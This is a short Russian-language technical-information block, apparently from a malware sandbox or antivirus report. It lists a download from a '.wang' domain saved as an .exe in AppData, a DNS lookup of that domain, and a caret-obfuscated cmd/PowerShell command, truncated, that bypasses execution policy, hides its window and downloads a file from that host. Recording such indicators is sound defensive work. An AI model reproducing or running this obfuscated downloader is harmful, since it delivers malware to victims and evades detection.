Техническая информация
- http://transporingsytw.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POWeRShEll.E^XE^ ^-^e^Xe^cutI^oNp^Olicy ^bYPAsS ^-^n^OPR^OFI^l^E^ -w^I^nDoW^ST^YLe ^HIDdeN^ (neW-oB^jEc^T^ ^SysT^e^M.N^Et.webclI^E^nT^).dow^nL^oADFiLE('http://transporing...
- DNS ASK tr#####ringsytw.wang
- '<SYSTEM32>\cmd.exe' /c "POWeRShEll.E^XE^ ^-^e^Xe^cutI^oNp^Olicy ^bYPAsS ^-^n^OPR^OFI^l^E^ -w^I^nDoW^ST^YLe ^HIDdeN^ (neW-oB^jEc^T^ ^SysT^e^M.N^Et.webclI^E^nT^).dow^nL^oADFiLE('http://transporing...' (со скрытым окном)